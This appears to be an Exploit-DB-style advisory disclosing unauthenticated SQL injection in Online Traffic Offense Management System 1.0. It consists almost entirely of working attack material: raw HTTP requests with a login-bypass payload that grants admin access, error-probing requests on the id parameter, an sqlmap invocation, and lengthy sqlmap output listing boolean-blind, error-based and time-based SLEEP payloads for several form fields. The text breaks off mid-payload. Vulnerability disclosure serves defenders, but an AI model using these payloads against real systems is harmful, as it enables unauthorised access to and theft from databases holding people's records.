扫码分享
验证:
体验盒子# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### SQL Injection
# All requests can be sent by both an authenticated and a non-authenticated user
# Example vulnerable pages and parameters:
* http://localhost/traffic_offense/classes/Users.php
Parameters:
- id
- firstname
- lastname
- username
* http://localhost/traffic_offense/classes/Login.php
Parameters:
- username
- password
* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
Parameters:
- id
* http://localhost/traffic_offense/classes/Master.php
Parameters:
- id
- date_created
- ticket_no
- status
- offense_id
- fine
- code
- name
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example 1
# Login request generate sql injection error
POST /traffic_offense/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 30
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/login.php
Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
username=xxxx'&password=xxxx2'
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 12:31:03 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 265
Connection: close
Content-Type: text/html; charset=UTF-8
<br />
<b>Notice</b>:Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\classes\Login.php</b> on line <b>22</b><br />
{"status":"incorrect","last_qry":"SELECT * from users where username = 'xxxx'' and password = md5('xxxx2'') "}
-----------------------------------------------------------------------------------------------------------------------
# Exploitable request - login parameter can be any value
POST /traffic_offense/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 47
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/login.php
Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
username=admin&password=xxxx')+or+'1'='1'+and+('1
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 12:24:50 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8
{"status":"success"}
-----------------------------------------------------------------------------------------------------------------------
Logged as admin account
-----------------------------------------------------------------------------------------------------------------------
## Example 2
# Sql injection detection on the example of pages with the id parameter
# Login request generate sql error - add ' next to the id parameter
GET /traffic_offense/admin/offenses/view_details.php?id=3' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
#Response from database - sql error
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 03:56:37 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7837
Connection: close
Content-Type: text/html; charset=UTF-8
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''3''' at line 1
SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '3'' <br />
<b>Notice</b>:Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>10</b><br />
<br />
<b>Notice</b>:Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>16</b>
[...]
# Request - add '' next to the id parameter
GET /traffic_offense/admin/offenses/view_details.php?id=3'' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
# Response did not return an error - sql injection confirmed
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 03:58:40 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7214
Connection: close
Content-Type: text/html; charset=UTF-8
<div class="container-fluid">
<div class="w-100 d-flex justify-content-end mb-2">
<button class="btn btn-flat btn-sm btn-default bg-lightblue" type="button" id="print"><i class="fa fa-print"></i> Print</button>
<button class="btn btn-flat btn-sm btn-default bg-black" data-dismiss="modal"><i class="fa fa-times"></i> Close</button>
</div>
[...]
-----------------------------------------------------------------------------------------------------------------------
## Example 3
# Using sqlmap on an intercepted request http://localhost/traffic_offense/classes/Master.php
POST /traffic_offense/classes/Master.php?f=save_offense_record HTTP/1.1
Origin: http://localhost
Content-Length: 1598
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
Host: localhost:80
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Connection: close
X-Requested-With: XMLHttpRequest
Sec-Fetch-Mode: cors
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record&id=1
Content-Type: multipart/form-data; boundary=---------------------------7900788429998101281579901385
Sec-Fetch-Dest: empty
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"
1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"
2021-08-18T15:00*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"
12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"
OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"
George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"
1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
652*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
3*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
1001*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"
1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"
Sample
-----------------------------7900788429998101281579901385--
# Using the sqlmap utility
C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 --dbms=MySQL -r C:\Users\Hubert\Desktop\0day\sql2 --proxy=http://127.0.0.1:8090
___
__H__
___ ___[']_____ ___ ___{1.5.9.6#dev}
|_ -| . [)] | .'| . |
|___|_[']_|_|_|__,|_|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:52:47 /2021-10-07/
[05:52:47] [INFO] parsing HTTP request from 'C:\Users\Hubert\Desktop\0day\sql2'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]
Multipart-like data found in POST body. Do you want to process it? [Y/n/q]
[05:52:51] [INFO] testing connection to the target URL
[...]
---
Parameter: MULTIPART #4* ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"
2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"
12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"
OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"
George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
652' RLIKE (SELECT (CASE WHEN (8015=8015) THEN '' ELSE 0x28 END)) AND 'howi'='howi
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"
1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"
Sample
-----------------------------7900788429998101281579901385--
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"
2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"
12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"
OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"
George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
652' AND (SELECT 4940 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(4940=4940,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zvbh'='zvbh
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"
1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"
Sample
-----------------------------7900788429998101281579901385--
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"
2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"
12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"
OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"
George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
652' AND (SELECT 7241 FROM (SELECT(SLEEP(5)))rEqK) AND 'CONm'='CONm
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"
1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"
Sample
-----------------------------7900788429998101281579901385--
Parameter: MULTIPART #5* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"
2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"
12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"
OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"
George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
3' AND 4015=4015 AND 'mPLR'='mPLR
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"
1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"
Sample
-----------------------------7900788429998101281579901385--
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"
2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"
12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"
OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"
George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
3' AND (SELECT 6830 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6830=6830,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pbeA'='pbeA
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"
1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"
Sample
-----------------------------7900788429998101281579901385--
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"
2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"
12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"
OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"
George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
3' AND (SELECT 5446 FROM (SELECT(SLEEP(5)))QMKi) AND 'GfhC'='GfhC
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"
1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"
Sample
-----------------------------7900788429998101281579901385--
Parameter: MULTIPART #6* ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"
2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"
12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"
OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"
George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
1001' RLIKE (SELECT (CASE WHEN (7186=7186) THEN '' ELSE 0x28 END)) AND 'rwJI'='rwJI
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"
1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"
Sample
-----------------------------7900788429998101281579901385--
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"
2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"
12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"
OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"
George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
1001' AND (SELECT 2971 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(2971=2971,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OeqR'='OeqR
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"
1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"
Sample
-----------------------------7900788429998101281579901385--
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"
2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"
12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"
OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"
George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
1001' AND (SELECT 5527 FROM (SELECT(SLEEP(5)))GfWJ) AND 'GtGB'='GtGB
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"
1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"
Sample
-----------------------------7900788429998101281579901385--
Parameter: MULTIPART #2* ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"
2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"
12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"
OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"
George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"
1' RLIKE (SELECT (CASE WHEN (8485=8485) THEN '' ELSE 0x28 END)) AND 'CyNe'='CyNe
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"
1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"
Sample
-----------------------------7900788429998101281579901385--
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"
2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"
12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"
OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"
George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"
1' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6653=6653,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tCsu'='tCsu
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"
1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"
Sample
-----------------------------7900788429998101281579901385--
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"
2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"
12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"
OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"
George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"
1' AND (SELECT 6178 FROM (SELECT(SLEEP(5)))CQxQ) AND 'MljD'='MljD
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"
1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"
Sample
-----------------------------7900788429998101281579901385--
Parameter: MULTIPART #3* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"
2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"
12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"
OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"
George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
1' AND 5855=5855 AND 'broT'='broT
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"
1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"
Sample
-----------------------------7900788429998101281579901385--
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"
2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"
12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"
OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"
George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
1' AND (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(9644=9644,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zaBh'='zaBh
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"
1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"
Sample
-----------------------------7900788429998101281579901385--
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"
2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"
12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"
OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"
George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"
1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
1' AND (SELECT 4422 FROM (SELECT(SLEEP(5)))wQes) AND 'GuRX'='GuRX
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"
3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"
1001
